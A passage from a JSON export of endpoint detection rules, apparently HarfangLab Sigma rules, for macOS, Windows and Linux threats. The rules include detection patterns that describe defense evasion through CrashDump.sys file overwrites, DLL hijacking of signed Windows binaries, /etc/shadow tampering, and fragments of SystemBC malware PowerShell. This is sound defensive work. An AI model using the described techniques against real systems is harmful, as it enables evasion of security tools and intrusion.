/opt/cisco/anyconnect/temp/downloader/vpndownloader.sh'\n\n exclusion_cyberwatch:\n ProcessParentCommandLine: 'find /etc/cyberwatch-agent/ -type d -exec chmod 750 {} ;'\n\n exclusion_homebrew:\n ProcessAncestors|contains: '|/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby|'\n\n exclusion_batchmod:\n ProcessParentImage: '/Volumes/Rescue HD/Outils/Utilitaires/BatChmod*/BatChmod.app/Contents/MacOS/BatChmod'\n\n exclusion_munki:\n ProcessParentImage: '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_node:\n ProcessAncestors|contains: '/.nvm/versions/node/v*/bin/node|'\n\n exclusion_claude:\n ProcessGrandparentCommandLine:\n - 'claude'\n - 'node /Users/*/.nvm/versions/node/v*/bin/claude'\n - '*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude *'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b",
"rule_name": "Suspicious Binary Made Executable",
"rule_description": "Detects an attributes change on a file to make it executable in an uncommon directory.\nAdversaries may set the execute bit on a file before executing it.\nIs it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-11-17",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085767Z",
"creation_date": "2026-03-23T11:45:34.085769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085774Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_executable_file_overwritten_using_crashdump.yml",
"content": "title: Executable File Overwritten using CrashDump.sys\nid: 05ef230b-2d48-4e49-82a9-20e1fce73c9e\ndescription: |\n Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\n By modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\n Threat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\n It is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\nreferences:\n - https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/02/11\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\DedicatedDumpFile'\n Details|endswith:\n - '.exe'\n - '.sys'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details|endswith: '\\dedicateddumpfile.sys'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e",
"rule_name": "Executable File Overwritten using CrashDump.sys",
"rule_description": "Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\nBy modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\nThreat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\nIt is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\n",
"rule_creation_date": "2025-02-11",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06168646-4339-42be-bcf4-a8f6ef23f53d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622141Z",
"creation_date": "2026-03-23T11:45:34.622143Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622148Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_shadow_modified.yml",
"content": "title: File /etc/shadow Modified\nid: 06168646-4339-42be-bcf4-a8f6ef23f53d\ndescription: |\n Detects a suspicious attempt to modify /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\n It is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/shadow'\n - TargetPath: '/etc/shadow'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/sudo'\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n - '/usr/sbin/cron'\n - '/usr/sbin/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '/usr/bin/passwd'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/chage'\n - '/kaniko/executor'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/rootlesskit'\n - '/usr/sbin/pwconv'\n - '/usr/bin/chsh'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/gdm3/gdm-session-worker'\n - '/usr/lib/snapd/snap-update-ns'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_busybox_adduser:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|startswith: 'adduser '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_passwd_busybox:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|contains:\n - 'passwd '\n - 'chown '\n - 'chpasswd '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-applyLayer'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_salt_minion:\n - ProcessCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine|startswith:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_snap:\n ProcessImage:\n - '/snap/snapd/??/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/???/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/?????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/??????/usr/lib/snapd/snap-update-ns'\n ProcessCommandLine|startswith: 'snap-update-ns'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06168646-4339-42be-bcf4-a8f6ef23f53d",
"rule_name": "File /etc/shadow Modified",
"rule_description": "Detects a suspicious attempt to modify /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\nIt is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\n",
"rule_creation_date": "2022-11-16",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "063e3a72-3dc5-411b-8f95-7a288514f8e5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082122Z",
"creation_date": "2026-03-23T11:45:34.082124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chgport.yml",
"content": "title: DLL Hijacking via chgport.exe\nid: 063e3a72-3dc5-411b-8f95-7a288514f8e5\ndescription: |\n Detects potential Windows DLL Hijacking via chgport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chgport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "063e3a72-3dc5-411b-8f95-7a288514f8e5",
"rule_name": "DLL Hijacking via chgport.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chgport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "065c4be3-1c64-4884-8239-a03e9bd028e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602221Z",
"creation_date": "2026-03-23T11:45:34.602224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wlrmdr.yml",
"content": "title: DLL Hijacking via wlrmdr.exe\nid: 065c4be3-1c64-4884-8239-a03e9bd028e7\ndescription: |\n Detects potential Windows DLL Hijacking via wlrmdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wlrmdr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "065c4be3-1c64-4884-8239-a03e9bd028e7",
"rule_name": "DLL Hijacking via wlrmdr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wlrmdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06851538-293b-454e-ba25-02a9d4300ca4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609078Z",
"creation_date": "2026-03-23T11:45:34.609082Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609090Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c",
"https://twitter.com/malmoeb/status/1571985877424816130",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_systembc_powershell_execution.yml",
"content": "title: SystemBC PowerShell Execution\nid: 06851538-293b-454e-ba25-02a9d4300ca4\ndescription: |\n Detects the execution of the PowerShell version of SystemBC's launcher.\n SystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n - https://twitter.com/malmoeb/status/1571985877424816130\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/09/27\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.SystemBC\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"For ($*=0; $* -ne 50; $*++) { $*[$*] =* $* }\"\n - '[string]$domain = \"{0}.{1}.{2}.{3}\" -f $a, $b, $c, $d'\n - '[void]$ps.AddParameter(\"Rc4_crypt\", $*)'\n - '[void]$ps.AddParameter(\"xordata_\", $*)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06851538-293b-454e-ba25-02a9d4300ca4",
"rule_name": "SystemBC PowerShell Execution",
"rule_description": "Detects the execution of the PowerShell version of SystemBC's launcher.\nSystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n",
"rule_creation_date": "2022-09-27",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1071"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "068ce414-d762-41fa-88fd-5e0df21bb756",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081159Z",
"creation_date": "2026-03-23T11:45:34.081161Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081166Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chglogon.yml",
"content": "title: DLL Hijacking via chglogon.exe\nid: 068ce414-d762-41fa-88fd-5e0df21bb756\ndescription: |\n Detects potential Windows DLL Hijacking via chglogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chglogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "068ce414-d762-41fa-88fd-5e0df21bb756",
"rule_name": "DLL Hijacking via chglogon.exe",
